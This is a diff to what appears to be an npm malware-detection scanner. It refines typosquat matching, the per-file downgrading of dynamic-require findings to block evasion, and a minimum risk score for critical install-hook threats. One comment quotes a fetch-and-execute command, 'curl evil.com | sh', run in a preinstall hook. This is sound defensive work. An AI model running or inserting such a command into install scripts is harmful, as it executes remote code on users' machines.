@@ -336,6 +353,9 @@ function findTyposquatMatch(name) {
     // Ignore si c'est exactement le meme
     if (nameLower === popularLower) continue;
 
+    // B13: Skip only the intended pair for whitelisted packages
+    if (pairedTarget && pairedTarget === popularLower) continue;
+
     // Ignore si le package populaire est trop court
     if (popular.length < MIN_PACKAGE_LENGTH) continue;
 

package/src/scoring.js

@@ -177,9 +177,21 @@ function applyFPReductions(threats, reachableFiles, packageName) {
   // Threshold raised from >1 to >4 (audit fix: >1 was trivially exploitable).
   const pluginLoaderCount = (typeCounts.dynamic_require || 0) + (typeCounts.dynamic_import || 0);
   if (pluginLoaderCount > 4) {
+    // Per-file: only downgrade in files that individually exceed threshold
+    // Prevents attacker from distributing 5+ requires across files to downgrade all
+    const perFilePluginCount = {};
+    for (const t of threats) {
+      if (t.type === 'dynamic_require' || t.type === 'dynamic_import') {
+        const f = t.file || '(unknown)';
+        perFilePluginCount[f] = (perFilePluginCount[f] || 0) + 1;
+      }
+    }
     for (const t of threats) {
       if ((t.type === 'dynamic_require' || t.type === 'dynamic_import') && t.severity === 'HIGH') {
-        t.severity = 'LOW';
+        const f = t.file || '(unknown)';
+        if (perFilePluginCount[f] > 4) {
+          t.severity = 'LOW';
+        }
       }
     }
   }
@@ -199,7 +211,7 @@ function applyFPReductions(threats, reachableFiles, packageName) {
       // vm_code_execution: full bypass — packages with only vm.Script calls (cassandra-driver,
       // webpack, jest) are legitimate. Real malware using vm always has other signals
       // (network, fs, obfuscation). The >3 count threshold is sufficient protection.
-      if (typeRatio < 0.5 ||
+      if (typeRatio < 0.4 ||
           (t.type === 'suspicious_dataflow' && typeRatio < 0.8) ||
           t.type === 'vm_code_execution') {
         t.severity = rule.to;
@@ -296,7 +308,12 @@ function calculateRiskScore(deduped) {
   }
 
   // 4. Compute package-level score (typosquat, lifecycle, dependency IOC, etc.)
-  const packageScore = computeGroupScore(packageLevelThreats);
+  let packageScore = computeGroupScore(packageLevelThreats);
+  // Floor: CRITICAL package-level threats (lifecycle_shell_pipe, IOC match) → minimum HIGH (50)
+  // A single "curl evil.com | sh" in preinstall = 25 points = MEDIUM without floor.
+  if (packageScore >= 25 && packageLevelThreats.some(t => t.severity === 'CRITICAL')) {
+    packageScore = Math.max(packageScore, 50);
+  }
 
   // 5. Cross-file bonus: aggregate signal from non-max files
   // A package with 3 files each scoring 20 is more suspicious than 1 file scoring 20.